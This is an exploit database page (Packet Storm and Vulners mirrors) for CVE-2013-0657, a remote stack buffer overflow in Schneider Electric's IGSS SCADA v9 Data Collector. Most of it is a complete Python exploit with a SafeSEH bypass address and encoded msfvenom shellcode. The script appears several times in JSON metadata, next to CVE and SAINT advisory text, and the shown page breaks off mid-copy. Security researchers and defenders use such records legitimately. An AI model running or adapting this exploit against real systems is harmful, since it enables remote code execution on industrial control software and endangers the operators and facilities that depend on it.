Search...

SEIG SCADA System 9 Remote Code Execution

2018-08-20T00:00:00

ID PACKETSTORM:148994
Type packetstorm
Reporter Alejandro Parodi
Modified 2018-08-20T00:00:00

Description

                                        
                                            `# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution  
# Author: Alejandro Parodi  
# Date: 2018-08-17  
# Vendor Homepage: https://www.schneider-electric.com  
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/  
# Version: v9  
# Tested on: Windows7 x86  
# CVE: CVE-2013-0657  
# References:   
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657  
  
import socket  
import struct  
  
ip = "192.168.0.23"  
port = 12397  
con = (ip, port)  
  
# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)  
# length = "\x00\x70\x00\x00\x00\x00\x00\x00"  
# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644  
# payload = length+message  
  
# Exploit Magic  
message_header = struct.pack("&lt;L", 0x6014) + "\x66\x66\x07\x00"  
message_protocol_data = "\x10\x00\x00\x00" + "\x19" + "\x00\x00\x00\x00\x00" + "\x04" + "\x00\x00\x00" + struct.pack("&gt;H", 0x6000)  
padding = "B" * 3344  
eip_safeseh_bypass_address = struct.pack("&lt;L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)  
  
# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\x00\xFF\x0A\x0D' -f python  
# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources  
nopsleed = "\x41"*100 # \x90 bad char bypass  
shellcode = "\xda\xcb\xbd\x0f\x83\x69\x70\xd9\x74\x24\xf4\x58\x31"  
shellcode += "\xc9\xb1\x4b\x83\xe8\xfc\x31\x68\x14\x03\x68\x1b\x61"  
shellcode += "\x9c\xa9\xcf\xd8\x3a\xb3\x6e\xfc\x1c\x37\x54\xf6\xc7"  
shellcode += "\x93\x5d\x47\xb3\xd2\x35\xb1\x3f\x7d\xdc\x42\xd7\x81"  
shellcode += "\x59\x48\x93\x7b\x98\x70\x2a\x6b\x98\x14\xea\xc5\x54"  
shellcode += "\x17\x7c\x8d\x25\x69\x60\x27\x1e\xc7\x8a\x6a\xd8\xcf"  
shellcode += "\xb6\xc3\x9d\x5a\x83\xd6\xea\x88\x14\x7d\x5a\x55\x71"  
shellcode += "\x90\x85\xb8\x37\x9e\x3e\xd7\x1a\x76\xf8\xb1\xb9\x63"  
shellcode += "\xb7\xef\xa3\xa6\xc0\xb8\x12\xb4\x18\x62\x1a\xe1\x9e"  
shellcode += "\x6f\x7e\xa2\x86\x6c\xf7\x3a\x31\xbd\x55\x42\x10\xad"  
shellcode += "\x89\x16\xa0\xb8\x6a\xd6\x4c\x20\xd9\xad\x81\x58\x77"  
shellcode += "\x0b\xa3\xaa\xba\x2c\x49\xf0\x26\xaa\xab\xce\x5a\xc3"  
shellcode += "\x41\x69\x60\xc4\x58\x71\x71\x9c\x3f\xbe\xc2\xbc\x49"  
shellcode += "\xdd\xab\x89\xf0\x46\xcb\x1a\x8a\xf1\xdb\xe5\x54\x1f"  
shellcode += "\xfb\x30\x3b\xb1\x17\x97\xb2\x3e\x31\xf8\x26\x13\x9c"  
shellcode += "\x16\xdd\x26\x7a\xe3\x9b\x6e\x29\x77\x49\xc7\x97\x98"  
shellcode += "\x39\x7b\x5f\xcd\xeb\x4a\x39\x6e\x66\x04\xbc\x6c\xa6"  
shellcode += "\x87\x01\x63\x4d\xf3\x35\xc9\x74\x35\xdf\xe7\x1f\x0c"  
shellcode += "\xd0\x69\x80\x8c\x5c\xde\x63\xfc\x19\x1b\x8e\x24\x3b"  
shellcode += "\x7e\x01\x97\x6f\x67\x8f\x07\x3f\x32\x13\x23\x80\x7e"  
shellcode += "\x9a\x01\x5a\xc0\x3c\xf9\xf5\x5a\x04\xb0\x54\x46\x0c"  
shellcode += "\xfb\x21\x4d\xd7\xe0\xb4\x02\xe5\x4c\x04\x5a\x5e\x37"  
shellcode += "\xd1\x61\x6d\xe1\x4d\xe8\xa8\xdf\x26\xdb\x55\x5a\x60"  
shellcode += "\x85\x68\x05\x6a\x21\x73\xdf\x73\xa4\xef\x26\x02\x7e"  
shellcode += "\xb0\xb1\xa6\xb1\xac\x15\x0f\x80\x34\xae\xe4\x8a"  
  
JUNK = "JUNK"*5202 # 20808 Bytes of JUNK  
  
payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK  
print "Payload length: "+str(len(payload))  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect(con)  
s.send(payload)  
s.recv(10)  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:148994", "type": "packetstorm", "bulletinFamily": "exploit", "title": "SEIG SCADA System 9 Remote Code Execution", "description": "", "published": "2018-08-20T00:00:00", "modified": "2018-08-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/148994/SEIG-SCADA-System-9-Remote-Code-Execution.html", "reporter": "Alejandro Parodi", "references": [], "cvelist": ["CVE-2013-0657"], "lastseen": "2018-08-21T01:59:59", "viewCount": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2018-08-21T01:59:59", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-0657"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5C1186B7A96936A722DD16BBE452BD6B"]}, {"type": "zdt", "idList": ["1337DAY-ID-30925"]}, {"type": "saint", "idList": ["SAINT:8C3F6FF0B19656C4E22DA0D1FFAF66EB", "SAINT:A8F8A1ECEDDA3AB332EA90D0C7A29537", "SAINT:D90D8BFD364F40BDFF1DDF059B92120F"]}, {"type": "ics", "idList": ["ICSA-13-018-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:45218"]}], "modified": "2018-08-21T01:59:59", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://packetstormsecurity.com/files/download/148994/seigscada9-exec.txt", "sourceData": "`# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution \n# Author: Alejandro Parodi \n# Date: 2018-08-17 \n# Vendor Homepage: https://www.schneider-electric.com \n# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/ \n# Version: v9 \n# Tested on: Windows7 x86 \n# CVE: CVE-2013-0657 \n# References: \n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657 \n \nimport socket \nimport struct \n \nip = \"192.168.0.23\" \nport = 12397 \ncon = (ip, port) \n \n# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER) \n# length = \"\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\" \n# message = \"\\x00\\x70AA\\x65\\x00\\x00\\x00AAAAAAAAAAAAAAAA\\x00\\x00\\x00\\x00\"+\"B\"*28644 \n# payload = length+message \n \n# Exploit Magic \nmessage_header = struct.pack(\"<L\", 0x6014) + \"\\x66\\x66\\x07\\x00\" \nmessage_protocol_data = \"\\x10\\x00\\x00\\x00\" + \"\\x19\" + \"\\x00\\x00\\x00\\x00\\x00\" + \"\\x04\" + \"\\x00\\x00\\x00\" + struct.pack(\">H\", 0x6000) \npadding = \"B\" * 3344 \neip_safeseh_bypass_address = struct.pack(\"<L\", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH) \n \n# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\\x00\\xFF\\x0A\\x0D' -f python \n# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources \nnopsleed = \"\\x41\"*100 # \\x90 bad char bypass \nshellcode = \"\\xda\\xcb\\xbd\\x0f\\x83\\x69\\x70\\xd9\\x74\\x24\\xf4\\x58\\x31\" \nshellcode += \"\\xc9\\xb1\\x4b\\x83\\xe8\\xfc\\x31\\x68\\x14\\x03\\x68\\x1b\\x61\" \nshellcode += \"\\x9c\\xa9\\xcf\\xd8\\x3a\\xb3\\x6e\\xfc\\x1c\\x37\\x54\\xf6\\xc7\" \nshellcode += \"\\x93\\x5d\\x47\\xb3\\xd2\\x35\\xb1\\x3f\\x7d\\xdc\\x42\\xd7\\x81\" \nshellcode += \"\\x59\\x48\\x93\\x7b\\x98\\x70\\x2a\\x6b\\x98\\x14\\xea\\xc5\\x54\" \nshellcode += \"\\x17\\x7c\\x8d\\x25\\x69\\x60\\x27\\x1e\\xc7\\x8a\\x6a\\xd8\\xcf\" \nshellcode += \"\\xb6\\xc3\\x9d\\x5a\\x83\\xd6\\xea\\x88\\x14\\x7d\\x5a\\x55\\x71\" \nshellcode += \"\\x90\\x85\\xb8\\x37\\x9e\\x3e\\xd7\\x1a\\x76\\xf8\\xb1\\xb9\\x63\" \nshellcode += \"\\xb7\\xef\\xa3\\xa6\\xc0\\xb8\\x12\\xb4\\x18\\x62\\x1a\\xe1\\x9e\" \nshellcode += \"\\x6f\\x7e\\xa2\\x86\\x6c\\xf7\\x3a\\x31\\xbd\\x55\\x42\\x10\\xad\" \nshellcode += \"\\x89\\x16\\xa0\\xb8\\x6a\\xd6\\x4c\\x20\\xd9\\xad\\x81\\x58\\x77\" \nshellcode += \"\\x0b\\xa3\\xaa\\xba\\x2c\\x49\\xf0\\x26\\xaa\\xab\\xce\\x5a\\xc3\" \nshellcode += \"\\x41\\x69\\x60\\xc4\\x58\\x71\\x71\\x9c\\x3f\\xbe\\xc2\\xbc\\x49\" \nshellcode += \"\\xdd\\xab\\x89\\xf0\\x46\\xcb\\x1a\\x8a\\xf1\\xdb\\xe5\\x54\\x1f\" \nshellcode += \"\\xfb\\x30\\x3b\\xb1\\x17\\x97\\xb2\\x3e\\x31\\xf8\\x26\\x13\\x9c\" \nshellcode += \"\\x16\\xdd\\x26\\x7a\\xe3\\x9b\\x6e\\x29\\x77\\x49\\xc7\\x97\\x98\" \nshellcode += \"\\x39\\x7b\\x5f\\xcd\\xeb\\x4a\\x39\\x6e\\x66\\x04\\xbc\\x6c\\xa6\" \nshellcode += \"\\x87\\x01\\x63\\x4d\\xf3\\x35\\xc9\\x74\\x35\\xdf\\xe7\\x1f\\x0c\" \nshellcode += \"\\xd0\\x69\\x80\\x8c\\x5c\\xde\\x63\\xfc\\x19\\x1b\\x8e\\x24\\x3b\" \nshellcode += \"\\x7e\\x01\\x97\\x6f\\x67\\x8f\\x07\\x3f\\x32\\x13\\x23\\x80\\x7e\" \nshellcode += \"\\x9a\\x01\\x5a\\xc0\\x3c\\xf9\\xf5\\x5a\\x04\\xb0\\x54\\x46\\x0c\" \nshellcode += \"\\xfb\\x21\\x4d\\xd7\\xe0\\xb4\\x02\\xe5\\x4c\\x04\\x5a\\x5e\\x37\" \nshellcode += \"\\xd1\\x61\\x6d\\xe1\\x4d\\xe8\\xa8\\xdf\\x26\\xdb\\x55\\x5a\\x60\" \nshellcode += \"\\x85\\x68\\x05\\x6a\\x21\\x73\\xdf\\x73\\xa4\\xef\\x26\\x02\\x7e\" \nshellcode += \"\\xb0\\xb1\\xa6\\xb1\\xac\\x15\\x0f\\x80\\x34\\xae\\xe4\\x8a\" \n \nJUNK = \"JUNK\"*5202 # 20808 Bytes of JUNK \n \npayload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK \nprint \"Payload length: \"+str(len(payload)) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(con) \ns.send(payload) \ns.recv(10) \n \n`\n"}

{"cve": [{"lastseen": "2020-12-09T19:52:37", "description": "Stack-based buffer overflow in Schneider Electric Interactive Graphical SCADA System (IGSS) 10 and earlier allows remote attackers to execute arbitrary code by sending TCP port-12397 data that does not comply with a protocol.", "edition": 5, "cvss3": {}, "published": "2013-01-21T16:55:00", "title": "CVE-2013-0657", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0657"], "modified": "2018-08-21T10:29:00", "cpe": ["cpe:/a:schneider-electric:interactive_graphical_scada_system:10.0", "cpe:/a:schneider-electric:interactive_graphical_scada_system:9.0"], "id": "CVE-2013-0657", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0657", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:schneider-electric:interactive_graphical_scada_system:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:schneider-electric:interactive_graphical_scada_system:9.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "description": "Added: 02/11/2013 \nCVE: [CVE-2013-0657](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657>) \nBID: [57449](<http://www.securityfocus.com/bid/57449>) \nOSVDB: [89324](<http://www.osvdb.org/89324>) \n\n\n### Background\n\n[Schneider Electric Interactive Graphical SCADA System (IGSS)](<http://igss.schneider-electric.com/products/IGSS-Legacy/what-is-igss.aspx>) is a supervisory control and data acquisition (SCADA) system designed to monitor and control industrial processes. The Data Collector (`**DC.exe**`) component listens on port 12397/tcp. \n\n### Problem\n\nA buffer overflow vulnerability in the `**DC.exe**` executable allows remote arbitrary code execution when a malicious user sends a specially crafted request to port 12397/tcp. \n\n### Resolution\n\nSchneider Electric has released software updates for [IGSS v9](<http://igss.schneider-electric.com/igss/igssupdates/v90/progupdatesv90.zip>) and [IGSS v10](<http://igss.schneider-electric.com/igss/igssupdates/v100/progupdatesv100.zip>). \n\n### References\n\n<http://ics-cert.us-cert.gov/pdf/ICSA-13-018-01.pdf> \n<http://www2.schneider-electric.com/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130110_advisory_of_vulnerability_affecting_igss_scada_software.xml> \n\n\n### Limitations\n\nThis exploit was tested against Schneider Electric Interactive Graphical SCADA System 9.0 on Microsoft Windows Server 2003 SP2 English with DEP OptOut. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-02-11T00:00:00", "published": "2013-02-11T00:00:00", "id": "SAINT:A8F8A1ECEDDA3AB332EA90D0C7A29537", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/schneider_electric_igss_dcexe_overflow", "type": "saint", "title": "Schneider Electric Interactive Graphical SCADA System Data Collector Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "edition": 2, "description": "Added: 02/11/2013 \nCVE: [CVE-2013-0657](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657>) \nBID: [57449](<http://www.securityfocus.com/bid/57449>) \nOSVDB: [89324](<http://www.osvdb.org/89324>) \n\n\n### Background\n\n[Schneider Electric Interactive Graphical SCADA System (IGSS)](<http://igss.schneider-electric.com/products/IGSS-Legacy/what-is-igss.aspx>) is a supervisory control and data acquisition (SCADA) system designed to monitor and control industrial processes. The Data Collector (`**DC.exe**`) component listens on port 12397/tcp. \n\n### Problem\n\nA buffer overflow vulnerability in the `**DC.exe**` executable allows remote arbitrary code execution when a malicious user sends a specially crafted request to port 12397/tcp. \n\n### Resolution\n\nSchneider Electric has released software updates for [IGSS v9](<http://igss.schneider-electric.com/igss/igssupdates/v90/progupdatesv90.zip>) and [IGSS v10](<http://igss.schneider-electric.com/igss/igssupdates/v100/progupdatesv100.zip>). \n\n### References\n\n<http://ics-cert.us-cert.gov/pdf/ICSA-13-018-01.pdf> \n<http://www2.schneider-electric.com/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130110_advisory_of_vulnerability_affecting_igss_scada_software.xml> \n\n\n### Limitations\n\nThis exploit was tested against Schneider Electric Interactive Graphical SCADA System 9.0 on Microsoft Windows Server 2003 SP2 English with DEP OptOut. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-02-11T00:00:00", "published": "2013-02-11T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/schneider_electric_igss_dcexe_overflow", "id": "SAINT:D90D8BFD364F40BDFF1DDF059B92120F", "type": "saint", "title": "Schneider Electric Interactive Graphical SCADA System Data Collector Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "description": "Added: 02/11/2013 \nCVE: [CVE-2013-0657](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657>) \nBID: [57449](<http://www.securityfocus.com/bid/57449>) \nOSVDB: [89324](<http://www.osvdb.org/89324>) \n\n\n### Background\n\n[Schneider Electric Interactive Graphical SCADA System (IGSS)](<http://igss.schneider-electric.com/products/IGSS-Legacy/what-is-igss.aspx>) is a supervisory control and data acquisition (SCADA) system designed to monitor and control industrial processes. The Data Collector (`**DC.exe**`) component listens on port 12397/tcp. \n\n### Problem\n\nA buffer overflow vulnerability in the `**DC.exe**` executable allows remote arbitrary code execution when a malicious user sends a specially crafted request to port 12397/tcp. \n\n### Resolution\n\nSchneider Electric has released software updates for [IGSS v9](<http://igss.schneider-electric.com/igss/igssupdates/v90/progupdatesv90.zip>) and [IGSS v10](<http://igss.schneider-electric.com/igss/igssupdates/v100/progupdatesv100.zip>). \n\n### References\n\n<http://ics-cert.us-cert.gov/pdf/ICSA-13-018-01.pdf> \n<http://www2.schneider-electric.com/corporate/en/support/cybersecurity/viewer-news.page?c_filepath=/templatedata/Content/News/data/en/local/cybersecurity/general_information/2013/01/20130110_advisory_of_vulnerability_affecting_igss_scada_software.xml> \n\n\n### Limitations\n\nThis exploit was tested against Schneider Electric Interactive Graphical SCADA System 9.0 on Microsoft Windows Server 2003 SP2 English with DEP OptOut. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-02-11T00:00:00", "published": "2013-02-11T00:00:00", "id": "SAINT:8C3F6FF0B19656C4E22DA0D1FFAF66EB", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/schneider_electric_igss_dcexe_overflow", "title": "Schneider Electric Interactive Graphical SCADA System Data Collector Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-08-20T11:44:52", "description": "SEIG SCADA System 9 - Remote Code Execution. CVE-2013-0657. Remote exploit for Windows_x86 platform", "published": "2018-08-19T00:00:00", "type": "exploitdb", "title": "SEIG SCADA System 9 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "modified": "2018-08-19T00:00:00", "id": "EDB-ID:45218", "href": "https://www.exploit-db.com/exploits/45218/", "sourceData": "# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution\r\n# Author: Alejandro Parodi\r\n# Date: 2018-08-17\r\n# Vendor Homepage: https://www.schneider-electric.com\r\n# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/\r\n# Version: v9\r\n# Tested on: Windows7 x86\r\n# CVE: CVE-2013-0657\r\n# References: \r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657\r\n\r\nimport socket\r\nimport struct\r\n\r\nip = \"192.168.0.23\"\r\nport = 12397\r\ncon = (ip, port)\r\n\r\n# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)\r\n# length = \"\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n# message = \"\\x00\\x70AA\\x65\\x00\\x00\\x00AAAAAAAAAAAAAAAA\\x00\\x00\\x00\\x00\"+\"B\"*28644\r\n# payload = length+message\r\n\r\n# Exploit Magic\r\nmessage_header = struct.pack(\"<L\", 0x6014) + \"\\x66\\x66\\x07\\x00\"\r\nmessage_protocol_data = \"\\x10\\x00\\x00\\x00\" + \"\\x19\" + \"\\x00\\x00\\x00\\x00\\x00\" + \"\\x04\" + \"\\x00\\x00\\x00\" + struct.pack(\">H\", 0x6000)\r\npadding = \"B\" * 3344\r\neip_safeseh_bypass_address = struct.pack(\"<L\", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)\r\n\r\n# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\\x00\\xFF\\x0A\\x0D' -f python\r\n# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources\r\nnopsleed = \"\\x41\"*100 # \\x90 bad char bypass\r\nshellcode = \"\\xda\\xcb\\xbd\\x0f\\x83\\x69\\x70\\xd9\\x74\\x24\\xf4\\x58\\x31\"\r\nshellcode += \"\\xc9\\xb1\\x4b\\x83\\xe8\\xfc\\x31\\x68\\x14\\x03\\x68\\x1b\\x61\"\r\nshellcode += \"\\x9c\\xa9\\xcf\\xd8\\x3a\\xb3\\x6e\\xfc\\x1c\\x37\\x54\\xf6\\xc7\"\r\nshellcode += \"\\x93\\x5d\\x47\\xb3\\xd2\\x35\\xb1\\x3f\\x7d\\xdc\\x42\\xd7\\x81\"\r\nshellcode += \"\\x59\\x48\\x93\\x7b\\x98\\x70\\x2a\\x6b\\x98\\x14\\xea\\xc5\\x54\"\r\nshellcode += \"\\x17\\x7c\\x8d\\x25\\x69\\x60\\x27\\x1e\\xc7\\x8a\\x6a\\xd8\\xcf\"\r\nshellcode += \"\\xb6\\xc3\\x9d\\x5a\\x83\\xd6\\xea\\x88\\x14\\x7d\\x5a\\x55\\x71\"\r\nshellcode += \"\\x90\\x85\\xb8\\x37\\x9e\\x3e\\xd7\\x1a\\x76\\xf8\\xb1\\xb9\\x63\"\r\nshellcode += \"\\xb7\\xef\\xa3\\xa6\\xc0\\xb8\\x12\\xb4\\x18\\x62\\x1a\\xe1\\x9e\"\r\nshellcode += \"\\x6f\\x7e\\xa2\\x86\\x6c\\xf7\\x3a\\x31\\xbd\\x55\\x42\\x10\\xad\"\r\nshellcode += \"\\x89\\x16\\xa0\\xb8\\x6a\\xd6\\x4c\\x20\\xd9\\xad\\x81\\x58\\x77\"\r\nshellcode += \"\\x0b\\xa3\\xaa\\xba\\x2c\\x49\\xf0\\x26\\xaa\\xab\\xce\\x5a\\xc3\"\r\nshellcode += \"\\x41\\x69\\x60\\xc4\\x58\\x71\\x71\\x9c\\x3f\\xbe\\xc2\\xbc\\x49\"\r\nshellcode += \"\\xdd\\xab\\x89\\xf0\\x46\\xcb\\x1a\\x8a\\xf1\\xdb\\xe5\\x54\\x1f\"\r\nshellcode += \"\\xfb\\x30\\x3b\\xb1\\x17\\x97\\xb2\\x3e\\x31\\xf8\\x26\\x13\\x9c\"\r\nshellcode += \"\\x16\\xdd\\x26\\x7a\\xe3\\x9b\\x6e\\x29\\x77\\x49\\xc7\\x97\\x98\"\r\nshellcode += \"\\x39\\x7b\\x5f\\xcd\\xeb\\x4a\\x39\\x6e\\x66\\x04\\xbc\\x6c\\xa6\"\r\nshellcode += \"\\x87\\x01\\x63\\x4d\\xf3\\x35\\xc9\\x74\\x35\\xdf\\xe7\\x1f\\x0c\"\r\nshellcode += \"\\xd0\\x69\\x80\\x8c\\x5c\\xde\\x63\\xfc\\x19\\x1b\\x8e\\x24\\x3b\"\r\nshellcode += \"\\x7e\\x01\\x97\\x6f\\x67\\x8f\\x07\\x3f\\x32\\x13\\x23\\x80\\x7e\"\r\nshellcode += \"\\x9a\\x01\\x5a\\xc0\\x3c\\xf9\\xf5\\x5a\\x04\\xb0\\x54\\x46\\x0c\"\r\nshellcode += \"\\xfb\\x21\\x4d\\xd7\\xe0\\xb4\\x02\\xe5\\x4c\\x04\\x5a\\x5e\\x37\"\r\nshellcode += \"\\xd1\\x61\\x6d\\xe1\\x4d\\xe8\\xa8\\xdf\\x26\\xdb\\x55\\x5a\\x60\"\r\nshellcode += \"\\x85\\x68\\x05\\x6a\\x21\\x73\\xdf\\x73\\xa4\\xef\\x26\\x02\\x7e\"\r\nshellcode += \"\\xb0\\xb1\\xa6\\xb1\\xac\\x15\\x0f\\x80\\x34\\xae\\xe4\\x8a\"\r\n\r\nJUNK = \"JUNK\"*5202 # 20808 Bytes of JUNK\r\n\r\npayload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK\r\nprint \"Payload length: \"+str(len(payload))\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(con)\r\ns.send(payload)\r\ns.recv(10)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45218/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nSEIG SCADA System 9 - Remote Code Execution", "edition": 1, "published": "2018-08-19T00:00:00", "title": "SEIG SCADA System 9 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0657"], "modified": "2018-08-19T00:00:00", "id": "EXPLOITPACK:5C1186B7A96936A722DD16BBE452BD6B", "href": "", "sourceData": "# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution\n# Author: Alejandro Parodi\n# Date: 2018-08-17\n# Vendor Homepage: https://www.schneider-electric.com\n# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/\n# Version: v9\n# Tested on: Windows7 x86\n# CVE: CVE-2013-0657\n# References: \n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657\n\nimport socket\nimport struct\n\nip = \"192.168.0.23\"\nport = 12397\ncon = (ip, port)\n\n# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)\n# length = \"\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\"\n# message = \"\\x00\\x70AA\\x65\\x00\\x00\\x00AAAAAAAAAAAAAAAA\\x00\\x00\\x00\\x00\"+\"B\"*28644\n# payload = length+message\n\n# Exploit Magic\nmessage_header = struct.pack(\"<L\", 0x6014) + \"\\x66\\x66\\x07\\x00\"\nmessage_protocol_data = \"\\x10\\x00\\x00\\x00\" + \"\\x19\" + \"\\x00\\x00\\x00\\x00\\x00\" + \"\\x04\" + \"\\x00\\x00\\x00\" + struct.pack(\">H\", 0x6000)\npadding = \"B\" * 3344\neip_safeseh_bypass_address = struct.pack(\"<L\", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)\n\n# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\\x00\\xFF\\x0A\\x0D' -f python\n# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources\nnopsleed = \"\\x41\"*100 # \\x90 bad char bypass\nshellcode = \"\\xda\\xcb\\xbd\\x0f\\x83\\x69\\x70\\xd9\\x74\\x24\\xf4\\x58\\x31\"\nshellcode += \"\\xc9\\xb1\\x4b\\x83\\xe8\\xfc\\x31\\x68\\x14\\x03\\x68\\x1b\\x61\"\nshellcode += \"\\x9c\\xa9\\xcf\\xd8\\x3a\\xb3\\x6e\\xfc\\x1c\\x37\\x54\\xf6\\xc7\"\nshellcode += \"\\x93\\x5d\\x47\\xb3\\xd2\\x35\\xb1\\x3f\\x7d\\xdc\\x42\\xd7\\x81\"\nshellcode += \"\\x59\\x48\\x93\\x7b\\x98\\x70\\x2a\\x6b\\x98\\x14\\xea\\xc5\\x54\"\nshellcode += \"\\x17\\x7c\\x8d\\x25\\x69\\x60\\x27\\x1e\\xc7\\x8a\\x6a\\xd8\\xcf\"\nshellcode += \"\\xb6\\xc3\\x9d\\x5a\\x83\\xd6\\xea\\x88\\x14\\x7d\\x5a\\x55\\x71\"\nshellcode += \"\\x90\\x85\\xb8\\x37\\x9e\\x3e\\xd7\\x1a\\x76\\xf8\\xb1\\xb9\\x63\"\nshellcode += \"\\xb7\\xef\\xa3\\xa6\\xc0\\xb8\\x12\\xb4\\x18\\x62\\x1a\\xe1\\x9e\"\nshellcode += \"\\x6f\\x7e\\xa2\\x86\\x6c\\xf7\\x3a\\x31\\xbd\\x55\\x42\\x10\\xad\"\nshellcode += \"\\x89\\x16\\xa0\\xb8\\x6a\\xd6\\x4c\\x20\\xd9\\xad\\x81\\x58\\x77\"\nshellcode += \"\\x0b\\xa3\\xaa\\xba\\x2c\\x49\\xf0\\x26\\xaa\\xab\\xce\\x5a\\xc3\"\nshellcode += \"\\x41\\x69\\x60\\xc4\\x58\\x71\\x71\\x9c\\x3f\\xbe\\xc2\\xbc\\x49\"\nshellcode += 